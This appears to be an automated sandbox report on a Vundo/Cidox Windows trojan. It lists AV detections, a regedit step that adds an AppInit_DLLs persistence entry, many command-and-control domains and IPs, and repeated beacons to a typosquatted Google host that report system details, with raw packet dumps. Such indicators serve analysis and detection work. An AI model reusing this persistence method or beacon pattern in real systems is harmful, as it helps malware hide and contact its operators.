Analysis Date2014-11-13 15:37:36
MD58dc8a182ba353a7a6fc1a32eeab4a8a7
SHA18b0f40cfebc665fc5e984beb22fbf06a013ef7f2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e10d299aee81c43ede6107cfd694d791 sha1: 909378f88f1bea29f23636abfaaed914d07407ed size: 157696
Section.rdata md5: 452932fb0f06ef597e216a44a5a4add4 sha1: fa8bd755ad0b66dde6fdd0798d3a1066b832aa0d size: 7680
Section.data md5: d5ca73063f2caf403729291c844e9b5e sha1: df79fd8183ccbecf49fb3180517e27eae6840db0 size: 3584
Section.rsrc md5: c96411e822dfe10e0259a74d0993b494 sha1: 9710ea17765291062c919b03c379ee0952609606 size: 20480
Timestamp2012-10-12 22:17:17
PackerMicrosoft Visual C++ ?.?
PEhashd90c42a2eaefe18856e200358c6cd6afd03c4bc1
IMPhash69b9295363fc8d11cadadd4e040942b4
AV360 SafeGen:Variant.Symmi.5161
AVAd-AwareGen:Variant.Symmi.5161
AVAlwil (avast)Vundo-XR [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen8
AVBullGuardGen:Variant.Symmi.5161
AVCA (E-Trust Ino)Win32/Vundo.N!generic
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17986
AVEmsisoftGen:Variant.Symmi.5161
AVEset (nod32)Win32/Kryptik.ANDO
AVFortinetW32/Cidox.AND!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Symmi.5161
AVGrisoft (avg)BackDoor.Generic15.CNOC
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7no_virus
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Symmi.5161
AVNormanGen:Variant.Symmi.5161
AVRisingno_virus
AVSophosTroj/Vundo-AK
AVSymantecno_virus
AVTrend MicroTROJ_SPNR.30L412
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\sqgyarh.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNSgetinball.com
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSnshouse1.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSnetrovad.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\sqgyarh.dll\\x00

Network Details:

DNSdebijonda.com
Type: A
141.8.225.80
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
141.8.225.80
DNSvornedix.com
Type: A
141.8.225.80
DNSdentagod.com
Type: A
141.8.225.80
DNSliteworns.com
Type: A
141.8.225.80
DNSvengibit.com
Type: A
141.8.225.80
DNStryangets.com
Type: A
141.8.225.80
DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
209.222.14.3
DNSfescheck.com
Type: A
209.222.14.3
DNSinzavora.com
Type: A
141.8.225.80
DNSgetinball.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc4+XrHWaR8LY
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc/kCGdp9ZUYD
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc/kCGdp9ZUYD
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc2t5PIYtxQ5I
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc2t5PIYtxQ5I
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc0h/HPjHB2Lt
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc4sB3kaad+Ty
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45GcwuHiebXOh2A
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45GcyqXAfbKaZgr
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc9uz2Kqt+ksf
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1145&av=0&vm=0&al=0&p=96&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/w5DJkl+vfb23KA+G/6vB47+qXzO45Gc1/idPwODnqc
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1042 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1044 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   4763342b 58724857 6152384c 59204854   Gc4+XrHWaR8LY HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47632f6b 43476470 395a5559 44204854   Gc/kCGdp9ZUYD HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47632f6b 43476470 395a5559 44204854   Gc/kCGdp9ZUYD HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633274 35504959 74785135 49204854   Gc2t5PIYtxQ5I HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633274 35504959 74785135 49204854   Gc2t5PIYtxQ5I HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633068 2f48506a 4842324c 74204854   Gc0h/HPjHB2Lt HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633975 7a324b71 742b6b73 66204854   Gc9uz2Kqt+ksf HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47633473 42336b61 61642b54 79204854   Gc4sB3kaad+Ty HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47637775 48696562 584f6832 41204854   GcwuHiebXOh2A HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
0x000000a0 (00160)   79672f77 35444a6b 6c2b7666 6232334b   yg/w5DJkl+vfb23K
0x000000b0 (00176)   412b472f 36764234 372b7158 7a4f3435   A+G/6vB47+qXzO45
0x000000c0 (00192)   47637971 58416662 4b615a67 72204854   GcyqXAfbKaZgr HT
0x000000d0 (00208)   54502f31 2e310d0a 486f7374 3a20616e   TP/1.1..Host: an
0x000000e0 (00224)   616c7973 74696373 2e676f6f 676c652e   alystics.google.
0x000000f0 (00240)   636f6d0d 0a0d0a                       com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 31343526   XX0000&key=1145&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d393626 6f733d35 2e312e32 3630302e   =96&os=5.1.2600.
0x00000060 (00096)   33267a3d 34353826 68617368 3d437643   3&z=458&hash=CvC
0x00000070 (00112)   6e426a56 6a38494f 4d333341 394c664f   nBjVj8IOM33A9LfO
0x00000080 (00128)   4764426b 6e6a7939 61577a41 4a464538   GdBknjy9aWzAJFE8
0x00000090 (00144)   4a783772 48745554 37765a36 317a6757   Jx7rHtUT7vZ61zgW
